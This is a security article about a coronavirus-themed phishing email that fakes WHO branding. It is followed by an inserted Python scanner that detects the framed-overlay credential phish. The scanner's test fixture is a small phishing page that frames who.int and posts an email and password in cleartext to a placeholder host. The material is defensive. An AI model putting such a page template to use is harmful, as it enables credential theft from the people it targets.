Coronavirus “safety measures” email is a phishing scam

Thanks to the Sophos Security Team for their help with this article.

Sadly, cybercrooks love a crisis, because it gives them a believable reason to contact you with a phishing scam.

Here’s a tasteless and exploitative example, reported to us by the Sophos Security Team, of a current scam that uses the coronavirus as its lure:

The email, which carries the logo of the World Health Organization, states:

Go through the attached document on safety measures regarding the spreading of corona virus.

Click on the button below to download

Symptoms common symptoms include fever,coughcshortness of breath and breathing difficulties.

Fortunately, at least for fluent speakers of English, the criminals have made numerous spelling and grammatical mistakes that act as warning signs that this is not what it seems.

The link you’re asked to click on is similarly, and fortunately, dubious.

Firstly, it seems to be a compromised music site with a weird name that doesn’t have any obvious connection to any well-known health organisation; secondly, it is an HTTP site, not an HTTPS site, which is sufficiently unusual these days to be suspicious in its own right.

Nevertheless, the scam page itself is incredibly simple – it can’t have taken the crooks more than a few minutes to put together – and visually effective.

The fake page consists of the official, current home page of the World Health Organisation (WHO), with an unassuming popup form on top of it.

It doesn’t just look like the WHO’s page in the background, it is the WHO’s page, rendered in a frame that’s embedded in the fake site:

You can see why someone who’s nervous about the coronavirus issue, or who has friends and family in the main areas of infection, or who wants to do the right thing by learning more about preventing the spread of the disease…

…might fill in the form, perhaps because they are feeling pressurised by (or not thinking clearly because of) the subject matter.

Indeed, many companies have already sent emails to their staff to offer advice, so reading additional information that is allegedly from the WHO sounds like a sensible and responsible thing to do.

Of course, if you put in your email address or your password and click through, you’ll be submitting the filled-in web form to the crooks.

Worse still, you’ll be submitting it over an unencrypted connection.

So anyone else on the same network as you, for example in your hotel lobby or the coffee shop, could potentially capture your network traffic and see the username and password you just put in.

Once you’ve clicked the [Verify] button, the crooks simply redirect you to the real WHO site at who DOT int, which looks just like the previous page you were on, minus the popup form…

…with the rather obvious exception that the address bar now looks (and is) correct, displaying the genuine WHO website name, showing a padlock and – if you click through and view the web certificate – a certificate that shows up as issued to the WHO itself.
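The build described above (the genuine WHO page shown in a frame, a credential form floated on top, the form posting in cleartext to the crooks' own host) is a recognisable pattern, and it can be checked for mechanically when an analyst or a mail gateway gets hold of the landing page's HTML. The following is an added example, not code from the article or from Sophos: a standard-library Python scanner that flags the indicators the article calls out, namely plain-HTTP delivery, a framed third-party site, and a credential form that submits over HTTP and to a host other than the one being displayed. The hostnames `music-site.example` and `login.example.org` and both HTML fixtures are constructed for the demonstration; only `www.who.int` comes from the article.

```python
"""Heuristic scanner for the framed-overlay credential phish pattern.

Added example; the sample pages and hostnames below are constructed fixtures.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _PageScanner(HTMLParser):
    """Collect <iframe src> values and each <form>'s action plus its <input> types."""

    def __init__(self):
        super().__init__()
        self.iframes = []   # src attribute of every <iframe>
        self.forms = []     # one {"action": str, "types": set} per <form>
        self._form = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # attribute values may be None
        if tag == "iframe":
            self.iframes.append(a.get("src", ""))
        elif tag == "form":
            self._form = {"action": a.get("action", ""), "types": set()}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["types"].add(a.get("type", "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def scan_page(page_url, html):
    """Return a list of indicator strings; an empty list means none of the pattern was seen."""
    page = urlparse(page_url)
    page_host = page.hostname or ""
    scanner = _PageScanner()
    scanner.feed(html)
    findings = []

    # Indicator 1: the landing page itself is served without TLS.
    if page.scheme == "http":
        findings.append("page served over plain HTTP")

    # Indicator 2: the page frames a site on a different host (the "real page in the background").
    framed_hosts = []
    for src in scanner.iframes:
        host = urlparse(urljoin(page_url, src)).hostname or ""
        if host and host != page_host:
            framed_hosts.append(host)
            findings.append(f"frames third-party site {host}")

    # Indicators 3 and 4: a credential form that posts in cleartext, or to a host
    # other than the one the visitor believes they are looking at.
    for form in scanner.forms:
        if not form["types"] & {"password", "email"}:
            continue  # not a credential form
        action = urlparse(urljoin(page_url, form["action"]))  # relative actions resolve against the page
        if action.scheme == "http":
            findings.append(f"credential form submits in cleartext to {action.hostname}")
        for host in framed_hosts:
            if action.hostname != host:
                findings.append(f"credential form overlaid on {host} but posts to {action.hostname}")
    return findings


# Constructed fixture modelled on the article's description (placeholder host).
SAMPLE_PAGE_URL = "http://music-site.example/who/index.html"
SAMPLE_HTML = """
<html><body>
<iframe src="https://www.who.int/" width="100%" height="100%"></iframe>
<div class="popup">
  <form method="post" action="http://music-site.example/who/verify.php">
    <input type="email" name="email">
    <input type="password" name="password">
    <input type="submit" value="Verify">
  </form>
</div>
</body></html>
"""

# Constructed benign fixture: an ordinary same-origin login form over HTTPS.
BENIGN_PAGE_URL = "https://login.example.org/"
BENIGN_HTML = """
<html><body>
<form method="post" action="/session">
  <input type="text" name="user">
  <input type="password" name="password">
</form>
</body></html>
"""

if __name__ == "__main__":
    for url, html in ((SAMPLE_PAGE_URL, SAMPLE_HTML), (BENIGN_PAGE_URL, BENIGN_HTML)):
        print(url, "->", scan_page(url, html) or "no indicators")
```

The scanner deliberately stays at the level of page structure rather than string-matching brand names, so it also catches the same overlay trick aimed at any other framed organisation; the benign fixture shows that an ordinary same-origin HTTPS login form produces no findings.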

What to do?
